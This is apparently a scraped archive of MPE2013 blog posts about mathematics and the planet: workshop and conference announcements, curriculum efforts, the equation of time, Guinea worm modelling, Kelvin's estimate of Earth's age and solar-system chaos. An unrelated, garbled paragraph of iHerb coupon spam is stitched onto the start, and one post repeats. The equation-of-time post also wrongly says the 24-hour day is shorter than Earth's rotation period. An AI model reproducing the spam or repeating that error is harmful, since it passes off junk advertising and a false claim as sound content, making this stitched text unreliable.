    Are you aiming to go shopping superfoods wholesale? Immediate cost savings. Perhaps you’re keen on natural and organic Brands of the Week? Instant cost savings. Ready to get on multi-buy deals for your shopping? Instantaneous savings! With iHerb coupons, every penny counts, and that’s why we stock the very best iHerb discount codes and provide to be discovered. Now you can deal with keeping your body, mind, and home in good sorts, and we’ll look after your budget plan.

    In concert with the MPE 2013 initiative, the NSF’s Mathematical Biosciences Institute (MBI) at Ohio State will host three workshops in the fall of 2013 under the theme of Ecosystem Dynamics and Management.  These workshops will bring together experts from many disciplines to address these challenges.

    Tony Nance
    Mathematical Biosciences Institute
    tony@mbi.osu.edu

    Posted in Ecology, Resource Management, Workshop Announcement | Leave a comment

    MPE in the Classroom

    Upon encountering a mathematics topic such as logarithms, students in typical introductory mathematics classes often ask “When will I ever use this math?”  Without seeing relevant applications, students lose motivation and without motivation, they struggle to learn the concepts.  In contrast, when students are first presented with authentic, important, “Big Questions” concerning valuable real world topics, they often learn the math just in time to address the topics and as a result they cannot help but be more motivated and engaged.  Our interactions with each other and our planet generate these “Big Questions,” addressing issues such as energy, water, food, air quality, health, quality of life, and climate change. One of the goals of MPE2013 is to collect, develop, and disseminate educational materials that highlight the role mathematics plays in helping us understand our planet and ourselves.

    As part of the United States launch of MPE2013, pedagogical talks on Integrating the Mathematics of Planet Earth 2013 in the College Mathematics Curriculum will be presented next week during the Joint Mathematical Meetings, the world’s largest annual mathematics conference in San Diego, California. The talks will address how to incorporate a wide variety of key issues related to the planet Earth in mathematics classes at varying curricular levels.

    Planet Earth inspired presentation topics include:
    •    Nonrenewable energy sources; a study of how long they will last and exploration of optimization methods for managing a dwindling supply.
    •    Water resources; ways to use real data to develop sustainable usage strategies.
    •    Arctic sea ice; a project that examines how data can be used to tell us about the past and the future.
    •    Global air temperature change; an investigation of its impact on the frequency of extreme weather events.
    •    Ozone depletion; accessible data analysis techniques allow for student self-discovery of possible future problems.

    A full list of speakers and abstracts can be found here.

    Development of new teaching materials is a highlighted activity within the MPE2013 educational program. For example, the Center for Discrete Mathematics and Theoretical Computer Science (DIMACS) will be releasing a set of sustainability focused modules during JMM and the Mathematical Association of America Professional Enhancement Program (MAA PREP) sponsored workshop Educating with Math for a Sustainable Future similarly will release a set of materials for classroom use later this year. Planning for future MPE curriculum development workshops, including the MAA PREP funded Undergraduate Sustainability Experiences in Mathematics (USE Math) on Your Campus and the NSF funded MPE 2013+ Workshop on Education for the Planet Earth of Tomorrow is underway.

    To encourage easy access to these and other K-16 focused, MPE-related resources, MPE2013 has created a dedicated MPE2013 Curriculum Materials webpage. This site includes a link to an open submission form that allows anyone to submit a brief description and link to materials that they would like to share on the MPE site.

    This is just an introduction to the MPE-themed educational activity planned for this year and beyond, but it exemplifies the educational goals of MPE2013; to encourage the development of a mathematically literate generation that is aware of the challenges we face and is motivated to solve them.

    Ben Galluzzo
    Shippensburg University

    Posted in Education | Leave a comment

    A Word from the President of SIAM

    As we enter the new year, SIAM — along with more than one hundred universities, research institutes, and other scientific organizations —is thrilled to be a part of Mathematics of Planet Earth 2013. It is an exciting year-long program dedicated to examining just what mathematics can teach us about the world’s most pressing challenges, whether it’s creating stronger and lighter materials, modeling epidemics, or better understanding extreme climate change. And the kickoff is just around the corner, at the Joint Math Meetings in San Diego later this month. This MPE13 blog will feature many researchers interacting and engaging with the public and the scientific community as MPE13 explores the world around us. So be sure to visit the blog all year and collaborate on it for your up-to-the-minute dose of exciting world-changing mathematics.

    Irene Fonseca, President
    Society for Industrial and Applied Mathematics (SIAM)

    Mellon College of Science Professor of Mathematics
    Carnegie Mellon University

     

    Posted in General | Leave a comment

    New Professional Master’s Programs Emerge in the Mathematical Sciences

    Unprecedented in its all encompassing scope and geographic reach, the MPE2013 year brings to the forefront the universality of mathematics, with the hopes of making the general public aware of the insights it provides into many human endeavors, of its capability of predicting natural phenomena and processes, as well as its power of creating and shaping new discoveries.

    This also brings about the need not only to inspire the new generation, but also to develop new educational programs for them, that cultivate vital quantitative skills and sow the seeds of the needed mathematical insights in an increasingly multidisciplinary and interconnected world.

    The Professional Science Master’s Programs (PSM), a new breed of graduate programs, have emerged in the last decade and a half as a response to the workforce need for STEM professionals with strong scientific and professional skills. Developed in consultation with business leaders, these programs provide depth in a discipline and breadth in adjacent fields, industrial projects and internships that stimulate creativity and innovation in emerging, predominantly multidisciplinary, areas. Currently almost 300 PSM programs in over 125 universities train students in different scientific areas.

    Several PSM programs in financial mathematics, industrial mathematics and data analytics have been developed in recent years, as well as PSM programs that have a significant mathematics and statistics component such as the bioinformatics PSMs. The workshop, Creating Tomorrow’s Mathematics Professionals, npsma.org/past-workshops funded by NSF, held a year ago, focused on PSMs in the mathematical sciences. Representatives from industry, Lilian Wu (IBM), Teresa Eller and Matt Nagowski (M&T Bank), Birgit Schoeberl (Merrimack Pharmaceuticals), addressed the need for mathematicians trained to mine large quantities of data, to use and develop models for financial instruments, for consumer risk and for network biology. Faculty representatives of PSM programs, Lorena Mathien and Joaquin Carbonara (Buffalo State), Paul Eloe (University of Dayton), Peiru Wu (Michigan State), Aric LaBarr (NC State), Sangya S. Varma, Deborah Silver, Ph.D. and David L. Finegold (Rutgers), Syed Kirmany (University of Northern Iowa), and Marcel Blais (WPI), presented their PSM programs, talked about the mathematics curriculum, the other science, engineering, business, and professional skills courses, and presented alumni profiles. For 2013 the National Professional Master’s Association (NPSMA) is planning similar workshops on data analytics and cyber security.

    The 2012 SIAM Report on Mathematics in Industry presents 18 case studies of business applications of mathematics that are contained in the areas of business analytics, mathematical finance, systems biology, oil discovery and extraction, manufacturing, communications and transportation, modeling complex systems, computer systems and IT. These suggest that in the next decade the employment for mathematically trained professionals will predominantly be in the finance and insurance industry, life sciences and pharmaceutical industry and information technology; these will need a workforce well trained in the areas of mathematical finance, risk analysis, computational modeling, data analytics, machine learning, optimization and statistics, who also have a good understanding of finance, business, biology, chemistry, computer sciences, etc.; existing and new PSM programs will need to respond to this need.

    MPE2013 is aimed at bringing the mathematics community together to work on the challenges facing the planet, at a time when all human activities have global significance and impact. At the same time we need to think at educating the young generation to understand and solve the challenging problems of the Planet Earth.

    Bogdan Vernescu, President
    National Professional Science Master’s Association

    Posted in Education | Leave a comment

    MPE2013, Antarctica, and the Porter Lecture

    Welcome to the MPE2013 Blog! During the coming year we intend to bring you information about the themes of MPE2013: mathematics (including statistics), climate, sustainability and the state of the planet. Some posts will report news items of general interest, or draw attention to special events taking place in the framework of MPE2013. Other posts will address relevant educational issues, or present personal thoughts about mathematics and our understanding of the environment. And, yes, we hope that there will be some provocative posts that will promote discussion and generate new ideas.

    Let me move on to the second item in the title of this blog. On Christmas Eve, The New York Times featured an article on Antarctica that caught my attention,“Antarctic Warming is Speeding Up, Study Finds.” The article was based on a paper released the previous day in the journal Nature Geoscience claiming that West Antarctica has warmed by 4.4 degrees Fahrenheit since 1958. If confirmed, this is shocking news. The Antarctic ice sheet is one of the best indicators of changes in the global climate system. It is already under attack at the edges by warmer ocean water, and a potential collapse of the ice sheet is one of the long-term hazards of global warming. We know relatively little about the Antarctic ice sheet. The place is not very friendly to visitors, and scientific observations are few and far between. But mathematicians have been and continue to be involved in efforts to get a better understanding of the Antarctic ice sheet and surrounding sea ice. This brings me to the third term in the title of this blog.

    On Saturday, January 12, Professor Ken Golden of the Department of Mathematics at the University of Utah, will give the Porter Lecture at the Joint Mathematics Meeting in San Diego, California. Ken is an expert on the mathematical modeling of composite materials and has been working on ice sheets, sea ice and melt ponds for several years. Not just from behind his desk, but out in the cold, both in the Arctic and in Antarctica. Several of his graduate, as well as undergraduate students have had the good fortune to join Ken on these expeditions. What better role model for aspiring mathematicians! Ken is an enthusiastic speaker, and I am looking forward to his lecture about “The Melting of Polar Ice Caps.” The lecture will be videotaped and made available for later use.

    Hans G. Kaper
    Co-director, Mathematics and Climate Research Network
    kaper@mathclimate.org

    Posted in Conference Announcement, Cryosphere, Public Event | Leave a comment

    A new year is starting today!

    A new year is starting today. What will happen during this year? Will it again be warmer that than the normal, as have been the last 12 years? Will extreme meteorological events threaten our crops? Can we expect dramatic hurricanes next fall? When and where will the next strong earthquake happen? Will the world economy continue its recovery from the last economic crisis? Will new invasive species destabilize or destroy our ecosystems? When and where will the next pandemic occur?

    We are all curious to better know our planet, and better understand its future. Part of what we cannot see with our eyes, we can discover with our mathematical glasses. For many of us, mathematicians, we had not brought together our natural curiosity about our planet and our professional activities in research and teaching. Mathematics of planet Earth is a fantastic opportunity to learn about the role of mathematics in the understanding and solution of planetary problems.

    During the whole year, in parallel with the scientific activities for specialists, MPE activities will occur on a regular basis around the world: colloquium talks, public lectures, activities for the schools. Hence, this provides an excellent opportunity to learn about MPE topics and the mathematical questions and developments behind these topics.

    The success of MPE2013 comes from the fact that it is so timely. The scientific community, including the mathematical community is aware of the need for new scientific developments to understand the planetary problems. In the schools, it is more important than ever to explain why mathematics is important: linking mathematics to societal problems is an excellent way to do so.

    There are no late comers with MPE2013. The planetary problems will, unfortunately, not be solved by the end of 2013. The curriculum material highlighting applications of mathematics to planet Earth problems that will have been developed for 2013 will start a new trend in education: more universities may decide to start programs in mathematics of the environment. Books may be produced in the long term. More enrichment material for the schools will be produced in the coming years. The community will have appreciated the benefits of an international collaboration.

    New partners continue to join and activities to be planned. India is organizing a large MPE competition in the schools of the countries with deadline in mid-June 2013. The University of Education in Vietnam is organizing an MPE math camp for students next summer. Malaysia organized a national launch on December 15. Two days of MPE activities are now planned in Mali, targeting all school levels starting from kindergarden. In Canada, the Pacific Institute for Mathematical Sciences in working on mathematics education for aboriginal communities. There is a lot of enthusiasm in these communities for MPE2013: linking nature to the teaching of mathematics is very close to the values of aboriginal communities, and likely to interest students and to encourage drop-outs to continue their studies.

    Christiane Rousseau

    Posted in General | Leave a comment

    The Mathematics of Extreme Climatic Events

    The UK’s Launch event at the Isaac Newton Institute was a fantastic success and the videos are now online
    The guest speakers included:
    Continue reading

    Posted in Conference Announcement, Conference Report | Tagged | 2 Comments

    CIM International Conferences and Advanced Schools Planet Earth, Portugal 2013

    The International Center of Mathematics CIM is a partner institution of the International Program Mathematics of Planet Earth 2013 (MPE 2013). CIM plans to organize and support several activities in the scope of International Program Mathematics of Planet Earth 2013 (MPE 2013).

    http://sqig.math.ist.utl.pt/cim/mpe2013/

    To this extent, CIM is organizing the following CIM International Conferences and CIM Advanced schools Planet Earth:

    MECC 2013 – International Conference and Advanced School Planet Earth, Mathematics of Energy and Climate Change, 18-28 March 2013.
    Keynote speakers and school lecturers: Inês Azevedo, Carnegie Mellon University, USA; Richard James, University of Minnesota, USA; Christopher K. R. T. Jones, University of North Carolina, USA; Pedro Miranda, Universidade de Lisboa, Portugal; Keith Promislow, Michigan State University, USA; Richard L. Smith, University of North Carolina, USA; José Xavier, Universidade de Coimbra, Portugal; David Zilberman, University of California, Berkeley, USA.

    DGS 2013 – International Conference and Advanced School Planet Earth, Dynamics, Games and Science, 26 August to 7 September 2013.
    Keynote speakers and school lecturers: Michel Benaim, Université de Neuchâtel, Switzerland; Jim Cushing, University of Arizona, USA; João Lopes Dias, Universidade Técnica de Lisboa, Portugal; Pedro Duarte, Universidade de Lisboa, Portugal; Diogo Gomes, Universidade Técnica de Lisboa, Portugal; Yunping Jiang, City University of New York, USA; Eric Maskin, Institute for Advanced Studies, USA (schedule permitting); Jorge Pacheco, Universidade do Minho, Portugal; David Rand, University of Warwick, UK; Martin Shubik, Yale University, USA (video lecture); Satoru Takahashi, Princeton University, USA; Marcelo Viana, Instituto de Matemática Pura e Aplicada IMPA, Brazil.

    The first two volumes of the CIM Series in Mathematical Sciences published by Springer-Verlag will consist of selected works presented in the conferences Mathematics of Planet Earth (CIM-MPE). The editors of these first two volumes are Jean Pierre Bourguignon, Rolf Jeltsch, Alberto Pinto and Marcelo Viana.

    Posted in Conference Announcement | Tagged | Leave a comment

    MPE2013 Has Been Launched!

    MPE2013 is being launched today! The international launch takes place at the winter meeting of the Canadian Mathematical Society in Montreal and coincides with the Canadian launch.

    It is already three years since I had the idea of MPE2013. During this time I had email exchanges with more than 100 partners, I was involved in several committees, and I made friends around the world. In the first year it was necessary to be pro-active in order to attract new partners. Also, it took time to get people at the school level interested. The enthusiasm for MPE2013 continued to grow. Now MPE2013 spreads by itself, and new partners join regularly. More countries and regions decide to organize activities for the schools. For instance, in France, the Ministry of Education decided that MPE would be the theme of the 2013 week of mathematics. The Math Awareness Month in the United States will deal with Sustainability. And I just learned that India is organizing a large MPE competition in the schools of the country, with a deadline in mid-June 2013.

    Because the international launch of MPE2013 takes place at the winter meeting of the Canadian Mathematical Society in Montreal, several public activities will take place in French. The launch starts with a panel discussion (in French) chaired by the science journalist Pierre Chastenay: “What can mathematics do for the planet?” Ivar Ekeland (UBC and Paris-Dauphine), a great popularizer of mathematics will be one of the panelists.

    Ivar Ekeland will also deliver an MPE public lecture, “Une longue histoire: la planète Terre et les mathématiques”. I had fascinating discussions with him, where he explained some of the main challenges of the economy of sustainability: you invest now for benefits to be felt in 50 to 100 years. How do you calculate the interest rates? The second MPE public lecture, “The complex challenge of sustainability,” will be given by Doyne Farmer (Oxford). In his abstract he states: “Sustainability forces us to think clearly about our vision of the future, putting philosophy into direct contact with science.” I had met Doyne at a workshop on “Mathematical Challenges in Sustainability” at DIMACS in November, 2010, and was impressed by his global vision of the planetary problems. It is a challenge for us mathematicians to make sure that we address the real problems, which may require finding new tools and not just applications for the tools that we already have.

    The meeting will start with a lecture by Graciela Chichilnisky, a mathematician and economist from Columbia University. Graciela Chichilnisky is scientifically very involved in all questions of sustainability. She introduced the concept of basic needs voted by 153 nations at the UN Earth Summit in 1993. She is also the author of the carbon market of the UN Kyoto Protocol that became international law in 2005. And she was U.S. Lead Author of the Intergovernmental Panel on Climate Change that received the 2007 Nobel Prize. If you read her book Saving Kyoto, you will learn that she is present at these international conferences on climate change and working to influence the final agreements to be signed by the participants. Graciela Chichilnisky is a model of a scientist who combines high-level science with a commitment to saving the planet. She was certainly an inspiration for me during these last years when I was working on MPE2013.

    The meeting comprises two other plenary lectures related to MPE. Catherine Sulem (Toronto) will speak of the fascinating subject of large ocean waves like tsunamis. The speed of propagation of such waves depends on the depth of the ocean and also on the bottom topography. Their impact further depends on the shape of the coastline.

    Among the four themes of MPE2013, we find a planet supporting life and a planet organized by civilizations. The lecture of Martin Nowak (Harvard) will make the link between these two themes by presenting the role of cooperation in the evolution and in the survival of intelligent life on Earth.

    MPE2013 is so successful not only because it is timely, but also because many mathematicians have worked very hard to make it a success. MPE2013 could not have reached the breadth without the immense role played by the American Institute of Mathematics (AIM) and its Director, Brian Conrey. Today I thank all the others globally, but I will certainly present them individually to you in my future blogs.

    Christiane Rousseau

    Posted in General | Leave a comment

    Mathematics of Planet Earth Beyond 2013 (MPE 2013+)

    Mathematicians Tackle Challenges to the Planet with Support from the National Science Foundation

    The U.S. National Science Foundation (NSF) has provided a grant of $467,549 to support the extension of the Mathematics of Planet Earth (MPE2013) program into the future.

    With the human population recently having surpassed 7 billion, protecting the earth and its resources is a shared challenge facing all of humanity. People need food, housing, clean water, and energy; yet the earth’s systems and dynamics are unpredictable, and its resources are limited. We need to understand the impact of our actions on the environment, how to adapt those actions to lessen our impact, how to predict and respond to catastrophic events, and how to plan for changes to come. The most pressing problems are inherently multidisciplinary, and the mathematical sciences have an important role to play. A large community of mathematical scientists has stepped forward to embrace this role through participation in the Mathematics of Planet Earth (MPE2013) project.

    MPE was launched by a group of mathematical sciences research institutes to promote awareness of the ways in which the mathematical sciences are used in modeling the earth and its systems—both natural and man-made. MPE aims to increase the contributions of the mathematical sciences community to protecting our planet by: strengthening connections with other disciplines; involving a broader community of mathematical scientists in related applications; and educating students and the general population about the relevance of the mathematical sciences. MPE’s mission is to increase engagement of mathematical scientists—researchers, teachers, and students—in issues affecting the earth and its future.

    MPE was conceived as a year-long project slated to begin in January 2013, involving mainly North American institutions. It has since evolved to become a truly worldwide initiative and now includes partners from all continents and endorsement by the International Mathematical Union, International Council of Applied and Industrial Mathematics, International Commission of Mathematical Instruction, and UNESCO, among others. As MPE has gained members, it has become clear that there is momentum to propel it beyond 2013. The problems facing our planet will persist, and this proposed project will involve mathematical scientists in laying the groundwork for a long-term effort to surmount them. The extended effort is called MPE2013+.

    The NSF support will allow us to sustain MPE activities beyond 2013 by:

    • conducting five research workshops that will each define a set of future research challenges;
    • establishing a Research and Education Forum (REF) associated with each workshop that will involve follow-up smaller group meetings to flesh out the challenges, identify potential follow-up activities, and begin collaborations;
    • holding an education workshop that helps to identify how to integrate themes identified in the research workshops into undergraduate and graduate curricula;
    • finding ways to involve the next generation of mathematical scientists in the effort, with special emphasis on involving under-represented minorities in the MPE workforce of the future, especially through a “pre-workshop” directed at preparing graduate students, postdocs, and others for involvement in the research workshops;
    • disseminating information about the mathematics of planet earth by creating a website and other publicity materials for the project.

    Research workshops will reflect some of the major themes of MPE: Management of Natural Resources, Sustainable Human Environments, Natural Disasters, Data-aware Energy Use, and Global Change.

    MPE2013+ will be managed by the Center for Discrete Mathematics and Theoretical Computer Science (DIMACS). DIMACS, based at Rutgers University, was founded as a prestigious NSF “science and technology center” and has 13 partner organizations and some 360 affiliated scientists. MPE2013+ is part of the DIMACS Sustainability Initiative (http://dimacs.rutgers.edu/SustainabilityInitiative/), which includes educational programs, workshop programs, research efforts, and international outreach. MPE2013+ is under the leadership of Dr. Fred Roberts of Rutgers University, a Professor of Mathematics and Emeritus Director of DIMACS.

    Organizing Committee for MPE2013+:

    • Brian Conrey, Executive Director of the American Institute of Mathematics (AIM)
      conrey@aimath.org

    • Margaret Cozzens, Center for Discrete Mathematics and Theoretical Computer Science (DIMACS)
      midge6930@comcast.net

    • David Ellwood, Research Director, Clay Mathematical Institute
      ellwood@math.harvard.edu

    • Mary Lou Zeeman, R. Wells Johnson Professor of Mathematics at Bowdoin College
      mlzeeman@bowdoin.edu

    • Fred Roberts, Professor of Mathematics at Rutgers University and Emeritus Director of DIMACS
      froberts@dimacs.rutgers.edu
    Posted in General | 2 Comments

    The Equation of Time

    The solar noon is defined as the time of the highest position of the Sun in the sky and occurs when the Sun crosses the meridian at a given position. The length of the solar day is the time between two consecutive solar noons.

    The mean length of the day, namely 24 hours, is a little less than the period of rotation of the Earth around its axis, since the Earth makes 366 rotations around its axis during a year of 365 days. If the axis of the Earth were vertical and the orbit of the Earth around the Sun circular, the mean length of the day would correspond to the time between two consecutive solar noons and therefore to the length of the solar day. For Greenwich’s meridian, the official noon is defined as the solar noon at the spring equinox, and then for the other days of the year by applying a period of 24 hours.

    The solar noon oscillates during the year; it coincides with the official noon only on four days during the year. The equation of time is the difference between the solar time and the official time (mean solar time).

    The fact that the equation of time shows oscillations with an amplitude of approximately 30 minutes is explained by two phenomena. The first one is the obliquity (tilt) of the Earth’s axis: if the orbit of the Earth around the Sun would be circular, the official noon would correspond to the solar noon at the equinoxes and at the solstices; it would be after the solar noon in fall and spring, and before the solar noon in summer and winter. The second ingredient is the eccentricity of Earth’s orbit around the Sun: when the Earth is closer to the Sun (during the winter of the Northern hemisphere), it has a higher angular velocity around the Sun, yielding longer solar days.

    Posted in Celestial Mechanics | Leave a comment

    Using Mathematical Modeling to Eradicate Diseases

    Guinea Worm Disease is a parasitic disease, spread via drinking water, that has been with us since antiquity. (It is mentioned in the Bible, and Egyptian mummies suffered from it.) Essentially, the parasite attaches itself to a water flea, you drink the flea, and your stomach acid dissolves the flea leaving the parasite free to invade your body. Because of gravity, it usually makes its way to the foot, where it lives for an entire year.

    After a year, your foot is burning and itching, so you put it in water. And if your village only has one source of water, then that source often ends up being the drinking water. At this point, the fully grown worm bursts out of your foot, spraying forth 100,000 parasites and hence restarting the process.

    Unfortunately, there is no drug to treat Guinea Worm Disease, and there is no vaccine either. Miraculously, however, Guinea Worm Disease is about to be eradicated, making it the first parasitic disease to be eradicated and the first to be eradicated without biomedical interventions. This is largely thanks to the efforts of former President Jimmy Carter. So how can one eradicate a disease without a drug, vaccine or immunity?

    Using a mathematical model, we can quantify the major factors that we can control: education (reducing the parasite birth rate $\gamma$), filtration (reducing the transmission $\beta$) and chlorination (increasing the parasite death rate $\mu_V$). The basic reproductive ratio $R_0$ represents the mean number of individuals infected by each infected individual. Hence, eradication starts under the threshold $R_0 = 1$.

    Guinea Worm Disease

    The figure represents the level surface $R_0(\gamma,\beta,\mu_V)=1$. If you are above the surface, then $R_0$ is greater than 1 and the disease will persist. If you are below the surface, then $R_0$ is less than 1 and the disease will be eradicated.

    Increasing the parasite death rate involves moving along the $\mu_V$ axis to the rear left. But the level surface is very shallow, so you need to move a long way to the back corner to get under the surface. Reducing transmissibility involves moving down the $\beta$-axis. But this is on a log scale, so that takes much longer than it first appears. However, see how steep the surface is for small $\gamma$? This makes it very easy to move under it by a small change in $\gamma$. This suggests that eradication should occur if we stick to one strategy: reducing the parasite birth rate.

    Encouraging people not to put their infected limbs in the drinking water means that each time a worm doesn’t burst into the water and 100,000 parasites aren’t released. What this means is that, in the final push to eradication, we should concentrate our efforts on reaching remote communities, informing them about the specifics of Guinea Worm Disease and its transmission cycle. Of course, a combination of all three factors will help. But it’s education that holds the key to removing this ancient scourge and points the way forward to controlling or eradicating other diseases without waiting for someone to develop a vaccine. If we can harness the power of education, we can change the world.

    Robert Smith?, Ottawa

    Posted in Disease Modeling, Epidemiology, Public Health | Leave a comment

    Call for MPE Bloggers

    The MPE2013 Working Group for Public Awareness and Social Media is in the process of organizing a community of MPE2013 Bloggers. We invite you to join in this public conversation about the mathematical sciences and their relevance to studies of Planet Earth. Everyone is welcome, whether you are an old hand at blogging or a newcomer to social media.

    We encourage personal commentary on any topic associated with MPE2013. A contribution can be a report on a meeting, a pointer to important research results, a website recommendation, a short essay on a key issue, a book review, a news item, or any other material that might be of interest to a broad audience. A contribution can be as short as a couple of paragraphs and may include a photo or illustration or even an audio or video clip. We recommend no more than about 1,000 words of text. Here is a link to a helpful web site, http://www.maa.org/pubs/FOCUSfeb-mar12_blogroll.html, in case you are wondering how to get started.

    We anticipate a daily blog during the entire year 2013. You may choose your date(s) and topic(s) to blog about your favorite event(s). We understand that last-minute changes are part of the action. To register, send a message to blog@mpe2013.org, with an indication of preferred dates and topics.

    Posted in General | Comments Off on Call for MPE Bloggers

    How Old Is the Earth?

    The first serious attempts to compute the age of the Earth were done by Lord Kelvin around 1840. Kelvin used Fourier’s law of heat, with the gradient of temperature measured empirically, and some very strong hypotheses simplifying the problem: there are no external sources of heat, and the planet is rigid and homogeneous. He gave an interval of 24 to 400 million years. It is now known that the age of the Earth is 4.5 billion years. Already at the time of Kelvin, his estimate was in contradiction with the observations of the geologists, and it was incompatible with the new theory of evolution of Darwin, which required a much older planet.

    It was Kelvin’s assistant, John Perry, who pointed out that the gradient of the temperature was too large for Kelvin’s hypothesis of homogeneity, and that this gradient could be explained by convective movements inside a fluid under a thin outer solid mantle; these convective movements would considerably slow down the cooling of the mantle and allow the age of the Earth to be over 2 billions years. Radioactivity, a source of heat, was soon after discovered, showing that energy could not be assumed to be constant. John Perry was visionary at his time; he was arguing that the mantle of the Earth is solid on short time scales and fluid over longer time scales. But the idea of continental drift met strong skepticism among the scientific community including the geologists, and it was only in the 1960s that it finally prevailed.

    Reference:
    P.C. England, P. Molnar and F.M. Richter, Kelvin, Perry and the Age of the Earth, American Scientist, Volume 95, 2007.

    Posted in Geophysics | Leave a comment

    Competition to Design Museum-Quality Modules for MPE Exhibit

    Mathematics of Planet Earth 2013 (MPE 2013) invites you to enter a competition to design virtual or physical museum-quality modules for an exhibition on themes related to Mathematics of Planet Earth.

    The winning modules will form the basis of a virtual exhibition that will be hosted through the IMAGINARY Project by the Mathematisches Forschungsinstitut Oberwolfach (MFO), an international research center based in the Black Forest of Germany. The inauguration of the exhibition will take place at the headquarters of UNESCO in Paris, March 5-8, 2013.

    The deadline for submissions is December 20, 2012. Details about the competition can be found here.

    Posted in MPE Exhibit | Leave a comment

    Chaos in the Solar System

    The motion of the inner planets (Mercury, Venus, Earth and Mars) is chaotic. Numerical evidence was given by Jacques Laskar, who showed in 1994 that the orbits of the inner planets exhibited resonances in some periodic motions. Because of the sensitivity to initial conditions, numerical errors grow exponentially, so it is impossible to control the positions of the planets over long periods of time (hundreds of millions of years) using the standard equations of planetary motion. Laskar derived an averaged system of equations and showed that the orbit of Mercury could at some time cross that of Venus.

    Another way to study chaotic systems is to use numerous simulations in parallel, using an ensemble of initial conditions and derive probabilities of future behaviors. The shadowing lemma guarantees that a simulated trajectory for a close initial condition resembles a real trajectory. In 2009, Laskar announced in Nature the results of an ambitious program of 2000 parallel simulations of the solar system over periods of the order of 5 billions years. The new model of the solar system was much more sophisticated and included some relativistic effects. The simulations showed a 1% chance that Mercury could be destabilized and encounter a collision with the Sun or Venus. A much smaller number of simulations showed that all the inner planets could be destabilized, with a potential collision between the Earth and either Venus or Mars likely in approximately 3.3 billion years.

    Posted in Celestial Mechanics | Leave a comment

    A blog for MPE2013

    I am particularly lucky on my first contribution to the MPE2013 blog to be able to announce to you that MPE2013 received the patronage of UNESCO. This includes, in particular, the International launching of the Mathematics of Planet Earth Open Source Exhibition foreseen to take place in February 2013.

    As you can see, we will have an MPE2013 blog. We expect to have occasional contributions in 2012, and we anticipate daily contributions as of January 1st 2013. This testifies to the magnitude of MPE2013.

    Of course, we have not yet planned for 365 bloggers for 2013! We need your help with a contribution. What could be a contribution? It could be a personal commentary on any topic associated with MPE2013: a report on a meeting, a pointer to important research results, a website recommendation, a short essay on a key issue, a book review, a news item, or any other material that might be of interest to a broad audience. A contribution can be as short as a couple of paragraphs and may include a photo or illustration or even an audio or video clip. You may choose your date(s) and topic(s) to blog about your favorite event(s). We understand that last-minute changes are part of the action. To register, send a message to blog@mpe2013.org, with an indication of preferred dates and topics.

    I intend myself to blog regularly in 2013. On one side, I will use the blog to share with you the new developments of MPE2013. But you will also discover that one of my passions is popularization of mathematics. I am a regular contributor of the (French) magazine Accromath (www.accromath.ca). This magazine is preparing for the beginning of 2013 a special issue on mathematics of Planet Earth, and we hope for a wider distribution outside of the province of Quebec for this special issue. If you look at the archives of Accromath, you will see that we have highlighted all the articles that are related to MPE topics. If more magazines around the world do the same, then this will allow for significant material that teachers will be able to bring to the classroom.

    It is now three years that I am working on MPE2013 and my main reward in this venture is that I am always discovering hidden mathematics in some MPE topics, learning about the beautiful mathematics in others, and understanding some of the mathematical challenges in the science of climate and sustainability. There are several important ingredients in good research: one is the significance of the question considered, and another is the power of the tools developed or used to solve it. These could be independent matters. Mathematicians are good problem solvers. They have powerful tools and they are able to create new tools for new problems. But this does not suffice. We need to ask the right questions, we need to use the right models. It could be very tempting to pass a line through a cloud of points, but what if the cloud of points is the beginning of an exponential phenomenon? Linear models can give good fit with data on short periods, but are we allowed to extrapolate on long periods? When we model a phenomenon, have we forgotten an essential parameter? Can we consider the model in isolation, or is the system influenced by other variables in a larger model? Let me share with you some of the new things I have learnt recently.

    Daniel Pauly, from the UBC Fisheries Centre, gave recently a public lecture at Centre de Recherches Mathématiques (CRM) on the state of fisheries in the world, and he talked of the decline of the cod in the Atlantic. There were two contradictory signals: the catches by the small boats close to the Eastern Canadian coast were drastically decreasing, but there was no significant decrease in the deep sea fishing catches. Which signal to follow? The choice was made to ignore the first signal, with the result that there is nearly no more cod in the Atlantic for almost 20 years. We know now that there was no contradiction between the two signals: even when there are few cods they stay together over a reduced areas, thus allowing good catches.

    Last week, I learned from Robert Smith? (sic) about the successful mathematical modeling of the Guinea worm. I was five years old in Guinea the first time I would hear the adults explaining the risk of catching this worm that could be a meter long and would live inside your body, usually your foot. The complicated cycle of this worm is well known, the disease is now decreasing, and we could dream of eradicating it in the near future. Among the many parameters, the one that proved the most important is … education! When one’s foot hurts, it is very tempting to put it in water. It is the moment that the worm chooses to lay 100,000 eggs… Education gives better results than chlorinating the water and the other techniques that have been tried. This example shows that we must have a very open mind for doing good research around MPE topics.

    As an inhabitant of the Earth and a curious person, it is intriguing to better know our planet.
    A year ago, not long after the earthquake in Japan, I received the following message by John McKay: “I am asking whether there will be a session on the effect of earthquakes on the rotation speed of the Earth?” And we started exchanging messages on the matter. He made me remark that a change of the rotation speed of the Earth forces many adjustments: recalibrating the telescopes since the polar axis of the Earth might have changed position because of the earthquake, readjusting the GPS, etc. Could this phenomenon be a good topic for a module for the MPE competition? Could it be a starting point for a modeling discussion in your course? The modeling could start with the physical situation: the closer the mass to the center of the Earth, the faster the rotation. Then, how do you orient the axis of the telescope, so that only one rotation movement suffices to keep the focus on a star during a long observation period? You need not solve all the problems. Asking questions is also part of the game…

    Christiane Rousseau

    Posted in General @fr | Leave a comment

    A Blog for MPE2013

    On this, my first, contribution to the MPE2013 blog I am particularly lucky to be able to announce to you that MPE2013 received the patronage of UNESCO. This includes, in particular, the international launch of the Mathematics of Planet Earth Open-Source Exhibition scheduled to take place in February, 2013.

    As you can see, we will have an MPE2013 blog. We expect to have occasional contributions in 2012, and we anticipate daily contributions starting January 1, 2013. This testifies to the magnitude of MPE2013.

    Of course, we have not yet planned for 365 bloggers for 2013! We need your help with a contribution. What could be a contribution? It could be a personal commentary on any topic associated with MPE2013: a report on a meeting, a pointer to important research results, a website recommendation, a short essay on a key issue, a book review, a news item, or any other material that might be of interest to a broad audience. A contribution can be as short as a couple of paragraphs and may include a photo or illustration or even an audio or video clip. You may choose your date(s) and topic(s) to blog about your favorite event(s). We understand that last-minute changes are part of the action. To register, send a message to blog@mpe2013.org, with an indication of preferred dates and topics.

